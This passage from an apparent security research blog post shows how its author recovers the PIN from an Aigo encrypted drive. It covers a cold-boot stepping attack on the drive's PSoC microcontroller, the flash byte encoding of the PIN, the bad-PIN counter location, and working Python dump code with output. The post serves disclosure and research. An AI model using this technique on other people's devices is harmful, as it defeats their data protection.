Block 126 should be about 125x64x18 = 144000µs after the start of the checksum. To make sure, I looked for checksum 0x47E2 in my full dump, and it looked more or less correct.

Then, after dumping lots of imprecise (because of timing) data, manually fixing the results and comparing flash values (by staring at them), I finally got the following bytes at delay 145527µs:

PIN          Flash content
1234567      2526272021222319141402
123456       2526272021221919141402
998877       2d2d2c2c23231914141402
0987654      242d2c2322212019141402
123456789    252627202122232c2d1902

It is quite obvious that the PIN is stored directly in plaintext ! The values are not ASCII or raw values but probably reflect the readings from the capacitive keyboard.
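The key codes can be inferred mechanically from the table. The Python 3 sketch below assumes one byte per digit, with the PIN starting at the first byte of each dumped string; the trailing bytes are ignored. `infer_key_codes` is an illustrative name, and the function raises an error if two PINs disagree on a code, which would mean the assumption is wrong.

```python
# Known PINs and the flash content recovered for each (from the table above)
KNOWN = {
    "1234567":   "2526272021222319141402",
    "123456":    "2526272021221919141402",
    "998877":    "2d2d2c2c23231914141402",
    "0987654":   "242d2c2322212019141402",
    "123456789": "252627202122232c2d1902",
}

def infer_key_codes(known):
    """Build a {flash byte: digit} map from known PIN / flash pairs."""
    codes = {}
    for pin, flash_hex in known.items():
        raw = bytes.fromhex(flash_hex)
        for digit, code in zip(pin, raw):      # one byte per digit (assumed)
            if codes.setdefault(code, digit) != digit:
                raise ValueError("code 0x%02x maps to two digits" % code)
    return codes

for code, digit in sorted(infer_key_codes(KNOWN).items()):
    print("0x%02x -> %s" % (code, digit))
```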

Finally, I did some other tests to find where the “bad PIN” counter is, and found this :

Delay  CSUM
145996 56E5 (old: 56E2, val: 03)
146020 571B (old: 56E5, val: 36)
146045 5759 (old: 571B, val: 3E)
146061 57F2 (old: 5759, val: 99)
146083 58F1 (old: 57F2, val: FF) <<---- here
146100 58F2 (old: 58F1, val: 01)

0xFF means “15 tries” and it gets decremented with each bad PIN entered.

Recovering the PIN

Putting everything together, my ugly code for recovering the PIN is:

def dump_pin():
    pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
               0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
    last_csum = 0
    pin_bytes = []
    for delay in range(145495, 145719, 16):
        csum = csum_at(delay, 1)
        byte = (csum-last_csum)&0xFF
        print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
        pin_bytes.append(byte)
        last_csum = csum
    print "PIN: ",
    for i in range(0, len(pin_bytes)):
        if pin_bytes[i] in pin_map:
            print pin_map[pin_bytes[i]],
    print

Which outputs:

$ ./psoc.py 
syncing:  KO  OK
Resetting PSoC:  KO  Resetting PSoC:  KO  Resetting PSoC:  OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN:  1 2 3 4 5 6 7 8 9

Great success !

Note that the delay values I used are probably valid only on the specific PSoC I have.

What’s next ?

So, to sum up on the PSoC side in the context of our Aigo HDD:

  • we can read the SRAM even when it’s protected (by design)
  • we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly

However, the attack is a bit painful to mount because of timing issues. We could improve it by:

  • writing a tool to correctly decode the cold-boot attack output
  • using a FPGA for more precise timings (or use Arduino hardware timers)
  • trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.

One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.

As the SROM probably reads the flash protection bits in the ReadBlock “syscall”, we can maybe do the same as described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.

One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?

Conclusion

To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !

What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better :)

Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey ;)